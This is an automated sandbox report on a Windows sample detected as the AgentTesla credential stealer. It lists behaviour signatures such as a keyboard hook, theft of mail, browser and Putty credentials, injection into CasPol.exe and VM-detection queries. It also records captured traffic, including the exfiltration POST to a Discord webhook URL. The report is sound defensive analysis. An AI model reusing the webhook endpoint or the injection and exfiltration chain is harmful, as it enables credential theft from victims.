Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e-dekont-20230206.exe

Overview

General Information

Sample Name:e-dekont-20230206.exe
Analysis ID:800718
MD5:33a5f92deee382035467caff29a8d487
SHA1:7e6daec4a2a4dde0f5148df4165fa8cebb7011e4
SHA256:e3b4406836308220da7989e5d539486ee1b71b4cc25a822e056993ab44675666
Tags:exegeoTUR
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • e-dekont-20230206.exe (PID: 5124 cmdline: C:\Users\user\Desktop\e-dekont-20230206.exe MD5: 33A5F92DEEE382035467CAFF29A8D487)
    • CasPol.exe (PID: 2256 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    Process Memory Space: CasPol.exe PID: 2256JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      Process Memory Space: CasPol.exe PID: 2256JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.2.5162.159.135.232497034432851779 02/07/23-18:41:32.301093
        SID:2851779
        Source Port:49703
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: e-dekont-20230206.exeReversingLabs: Detection: 41%
        Source: e-dekont-20230206.exeVirustotal: Detection: 55%Perma Link
        Machine Learning detection for sample
        Source: e-dekont-20230206.exeJoe Sandbox ML: detected
        Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49702 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49703 version: TLS 1.2
        Source: e-dekont-20230206.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: FUCKYOU.pdb source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: FUCKYOU.pdbxc source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: NNbHhH.pdb source: e-dekont-20230206.exe
        Source: Binary string: NNbHhH.pdbH source: e-dekont-20230206.exe

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49703 -> 162.159.135.232:443
        May check the online IP address of the machine
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
        Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1Content-Type: multipart/form-data; boundary=----------42b446e635b543ad97de25b01e6979b4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1224Expect: 100-continueConnection: Keep-Alive
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 17:41:32 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=a8ea0446a70e11ed8d802657744d3ae7; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/strict-transport-security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bty7akNoWX6OC4aoE2iHe7LxHQHtrn188ZjWicZIiSBh1heuF9zsXpH9biouDi8l7hbBetRLrMi7Ya7Ieov%2FahcmIdQSLBEYWkkXiRzLyJCYMmwGMyfI%2B0e3oFmC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __sdcfduid=a8ea0446a70e11ed8d802657744d3ae7c23a0232fc8c5f932fd4f6c1c91175609cee1f861eccdf03b6a96c0a50384823; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/Set-Cookie: __cfruid=7623650af91c9a0c1d05a6a7bc2a77b0906cb4ae-1675791692; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 795deabcc9628fdd-FRA{"message": "Unknown Webhook", "code": 10015}
        Source: CasPol.exe, 00000001.00000002.560208417.0000000006262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
        Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
        Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
        Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
        Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31
        Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com4Dp
        Source: unknownHTTP traffic detected: POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1Content-Type: multipart/form-data; boundary=----------42b446e635b543ad97de25b01e6979b4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1224Expect: 100-continueConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49702 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49703 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Installs a global keyboard hook
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Contains functionality to register a low level keyboard hook
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06B90290 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06B92078,00000000,00000000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D90764
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D96CAD
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D90816
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A3C5B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A317A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A31772
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A301A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A39328
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06B90D20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06B99DF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06F442D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06F4E088
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06F4B178
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06F47C08
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06F48BC0
        Source: e-dekont-20230206.exeStatic PE information: No import functions for PE file found
        Source: e-dekont-20230206.exe, 00000000.00000000.291653847.0000022E8D92C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNNbHhH.exe. vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.296795377.0000022E9F6E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.295935631.0000022E8D9D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exeBinary or memory string: OriginalFilenameNNbHhH.exe. vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: e-dekont-20230206.exeReversingLabs: Detection: 41%
        Source: e-dekont-20230206.exeVirustotal: Detection: 55%
        Source: e-dekont-20230206.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\e-dekont-20230206.exe C:\Users\user\Desktop\e-dekont-20230206.exe
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e-dekont-20230206.exe.logJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
        Source: e-dekont-20230206.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: e-dekont-20230206.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: e-dekont-20230206.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: e-dekont-20230206.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: FUCKYOU.pdb source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: FUCKYOU.pdbxc source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: NNbHhH.pdb source: e-dekont-20230206.exe
        Source: Binary string: NNbHhH.pdbH source: e-dekont-20230206.exe

        Data Obfuscation

        barindex
        .NET source code contains potential unpacker
        Source: e-dekont-20230206.exe, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs.Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs.Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs.Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        .NET source code contains method to dynamically call methods (often used by packers)
        Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D9826D push edi; retf
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D9821E push edi; retf
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D9890E push eax; retf
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D9841A push ebp; retf
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A37C9A push eax; retf
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A37499 push FFFFFF8Bh; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A37CE0 pushfd ; retf
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A38424 push esp; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A337B7 pushad ; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A37E40 push 6C66h; ret
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06B9CF26 push es; retf
        Source: e-dekont-20230206.exeStatic PE information: 0xEC8B859F [Tue Oct 4 11:38:07 2095 UTC]
        Source: initial sampleStatic PE information: section name: .text entropy: 7.97077131969678
        Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csHigh entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csHigh entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csHigh entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
